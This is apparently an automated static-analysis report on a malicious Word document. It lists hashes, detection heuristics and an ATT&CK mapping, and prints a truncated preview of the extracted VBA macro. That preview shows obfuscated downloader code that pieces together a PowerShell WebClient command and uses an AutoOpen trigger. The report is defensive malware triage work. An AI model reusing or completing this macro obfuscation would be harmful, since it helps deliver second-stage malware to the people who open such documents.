Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 566372792b34496b…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 150.5 KB
Created: 2018-02-16 23:28:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 0916f46aeaa0d45890637aa42659fc11
SHA-1: f7c586a8a836c797bee4bc81d067164a8e68337b
SHA-256: 566372792b34496b81f940e1c68a4977161ba4ce7a4b9b16bc18e3a0e8196fea
Risk score: 182

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic

The sample is a malicious Office document containing a VBA macro. The macro uses a Shell() call, indicating an intent to execute arbitrary commands. The obfuscated script assembles a command string that includes the fragments 'system' and 'net.WebClient', which suggests it is designed to download and execute a second-stage payload. An AutoOpen entry point causes the macro to run as soon as the document is opened, which further confirms the malicious intent.

Heuristics (6)

  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 32003 bytes
SHA-256: 649e38887c0cd09b479744d71cd0dcb7d3660cf619b7e19d901af666b075a384

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "vDVIEtufD"
Function zUKnXOMRMv()
On Error Resume Next
YtqddXtHi = 5367691 + Atn(dRHswYQo) / EGDNtJD - Sgn(ZMUvppNWIwHTnu * Log(jfFOYYnPP)) / (9423971 - WwLoUidoiqH * ncuVocJUb - iThouf)
jqTfNiKIWRd = 4697346 + Atn(zEwITQKUcZqw) / hcIRmiCw - Sgn(GcGMOsGfnwQr * Log(CXfJdLTzkicuB)) / (8278743 - WIAVnKwWC * CSNwls - YoakmcArinW)
cBQkzLiGS = 9581160 + Atn(RMBhIfzvEj) / BcCbs - Sgn(CwmuWN * Log(okfAdIWb)) / (4744177 - opRjoFumU * WjJaY - YkXLivzktYzzRv)
bhahizAIOOc = (lvaDPBNrhmDC) + yHBjksbJKSUgsssd("MwOTcHdmwWKlSTzhwUcInwdxKWOdx+Odphg+phgwg'+'p+wphg+phggpxIOdx+OdxnOdx+OdxvoOdx+Odx6KOdx+OdxWnjFhVSXpjRj", 23, 70)
sQKQAAj = 5240504 + Atn(jmEMqtpjnP) / zVYsvG - Sgn(NnXzVi * Log(atrrozuW)) / (7398812 - ZXPNUwu * wmumdPwzUroG - RZsQzzpzSLa)
ubMINfT = 6735292 + Atn(TXrssqd) / WrZnQct - Sgn(cChfbIwWzVwFm * Log(bTDQvaGczzd)) / (4402406 - hTciVwIpIsDlL * UvXsYapQF - zhSjADkCENQ)
mJHizDTtvvr = 666493 + Atn(mdIiqTaA) / kBmjbFEwERN - Sgn(jniYpEIBjzIQa * Log(OPwzzijUwQzU)) / (5347164 - zIIzpbDpiFB * SzwmsWF - qpzFTiJPqNbVc)
jJLWFnhT = (srICItEaE) + yHBjksbJKSUgsssd("mSW+w'+'gpt6KW) Swgp+wgpOdx+Odxystemwgp+wgpOdx+Odphg+phgwgp+wgpx.NOdx+Odxet.WebCliMDTBZJ", 4, 78)
KwbCMjY = 1379585 + Atn(owRdjlpv) / zjvGJREIIk - Sgn(YtjpAGsov * Log(ldTjsaTN)) / (3188132 - XouMofHaXEAuvk * uSccatBAKMFba - rkvrnzjz)
jbolvzSbEkH = 3847928 + Atn(UwRRr) / riimwHr - Sgn(qDWojAjEhJjT * Log(CHlKv)) / (9667326 - IbbjJvVXso * jtKBjdvP - RQRIkYKo)
sRkjobvbOS = 5174092 + Atn(bDJOcPbmfofMLt) / wZuBXIOfiKrJT - Sgn(kkjwvMPZihlIqQ * Log(oFEYRowPmD)) / (7688393 - XiEkFHm * DwPPjbXuMPPRw - qFmlC)
jPiSOo = (iMkVKYbOkoIIDf) + yHBjksbJKSUgsssd("jzrumVBizQqpipI+Odxwgp+wgp+'+'Odx6Owgp+wgpdx+Odx'+'KWkOdx+Odx6wgp+wgpOdx+OdxKW+6Odx+'+'OdxKWOdx+Ophg+phgdxe-Iphg+phgOdx+OdxteOdx+OdxmAAaXIwbRDwsVRwUdPWm", 16, 117)
ufOasiCtYcQ = 636538 + Atn(nWPTowwTF) / IiEWHhjcTP - Sgn(PNbjBQzuMuh * Log(XFljYGcw)) / (2409974 - cOolShKGnknnYI * mnhAZshaRhRV - LWqQWUlNrPwPjG)
wwCbAWXNz = 1248540 + Atn(djjdwlSvwmCuoX) / BMMvR - Sgn(XREWZuXjkqmbc * Log(zkrAZDvSjRrZ)) / (3921512 - zDXKpDG * cHWrvMNw - TLkGQULW)
nWmhimcQPN = 2675513 + Atn(EhmiAaLmjSblZj) / IkihHjEnBXO - Sgn(FjjLobFCkpc * Log(RjajdnhmD)) / (5072127 - khoFPA * lGmpGFzHnKUiv - HIQXIYJN)
cqBsDUTMdwr = (azjADWXppprqQE) + yHBjksbJKSUgsssd("AkJXtdcin+'wgp+wgpxtSiajYS", 10, 10)
EJlXciMrQ = 4845121 + Atn(iGbkXQKJa) / wdnpicEOkYp - Sgn(opnNTKHziWEbn * Log(ZGjFZSDmktM)) / (6385423 - wabsAinSmzKz * BazbY - CuCwifz)
jLmMmW = 4470131 + Atn(BEtAmWLZGiEtz) / nIWIYQcn - Sgn(UBittc * Log(MBLzRiDJKipBs)) / (9553954 - SDdPpLWa * OOvZzH - SwNRDhCAEF)
VzVzQIorwp = 2412748 + Atn(uaauLAibQdnhpa) / iCniK - Sgn(BXFfj * Log(kBdLkzYj)) / (6148937 - UjZQjMoJjbcd * zQaCutCV - fjwanSC)
wnmwSowRkXU = (bdUjWAWRYfpd) + yHBjksbJKSUgsssd("iwhtTmDLzEONKAszdx)  -RePlaCE  OdxwWROdx,'+'[chAR]92 -CRePlAcEOdxzobOdx,[chAR]96  -CRePlAcE([chAR]83+[chARwgp+ponZZapwa", 17, 95)
tQDTcRjdElw = 853999 + Atn(SFZVGwKiEaOLV) / XETYQa - Sgn(qtHXtkmHvadzPb * Log(PNpzuFDG)) / (3288394 - noGiJuodubM * wNOXbIAl - GhGpFjR)
JDwTUwrzPnB = 6212521 + Atn(nmqnFvjZlfoVU) / EwPblWduGfXjHA - Sgn(EKXzEoacKISrC * Log(UwqmhCspH)) / (6156491 - MsfKQY * jjhURYPLdUET - fbXmjjua)
MPuJEcBc = 9623035 + Atn(ODrns) / vRtjdLWpziRXVY - Sgn(loMikVsaj * Log(NifSRakWQi)) / (550108 - jpUFhnE * XEZcdPi - IZCrKF)
lYkQljCUsKE = (wEoHhfvJzimdTF) + yHBjksbJKSUgsssd("IFwgp-wgp+wgphg+phgpoOd'+'x'+'+Odwgp'+'+wgpxbOdx+Odxjec6'+'KWOdx+Odx+6phg+phgKWt6KOdphg+phgx+OdxW) raOdx+OdxndoOdx+wgp+wgpOdxm;LD9Owgp+wgpdx+OdxY'+'Odx+phg+phgOdxYUOdx+Odx = .(6Odphg+'+'phgx+wgpPBwrNjNOaljfWJMYutvPiKMSGl", 3, 192)
lEJtBBXIMWV = 593369 + Atn(CwaNqfLAiZrP) / FAhWzk - Sgn(CLGzdm * Log(VpwGUniiHGnOJJ)) / (5071487 - wSPdzUnkK * vmrpbkEiq - fSWbbat)
HJwpHdEi = 5106000 + Atn(kawclHjNJzA) / Owwrw - Sgn(RfCKbSPufwnB * Log(bNBZzwKGh
... (truncated)